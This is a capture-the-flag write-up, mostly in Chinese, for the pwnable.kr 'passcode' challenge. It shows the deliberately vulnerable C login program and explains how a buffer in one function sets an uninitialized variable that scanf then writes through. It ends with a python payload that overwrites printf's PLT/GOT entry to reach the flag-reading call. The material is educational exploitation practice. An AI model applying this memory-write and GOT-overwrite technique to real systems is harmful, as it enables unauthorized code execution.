passcode

Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)

 

程序源码如下：

#include <stdio.h>
#include <stdlib.h>

void login(){
        int passcode1;
        int passcode2;

        printf("enter passcode1 : ");
        scanf("%d", passcode1);
        fflush(stdin);

        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");
        scanf("%d", passcode2);

        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}

void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name);
        printf("Welcome %s!\n", name);
}

int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");

        welcome();
        login();

        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;
}

login函数中scanf未加取地址符，因此实际上将会把passcode1和passcode2的值作为地址输入数据

如果能控制passcode1或者passcode2的值就可以在任意地方写入

通过调试可以得到，welcome中name距离login中passcode1的位置仅有96，因此name输入100个字符就可以控制passcode1的初始值，但是无法控制passcode2

因此可以把passcode1的初始值设为printf的plt表，然后在输入passcode1时，将printf的plt表改为调用system("/bin/cat flag")的位置

获取plt表位置可以用readelf -r ./passcode，获取system("/bin/cat flag")位置可以在gdb中通过disassemble命令得到

因此通过python将输入传入passcode中

python -c "print 'a'*96+'\x00\xa0\x04\x08'+'134514147\n'" | ./passcode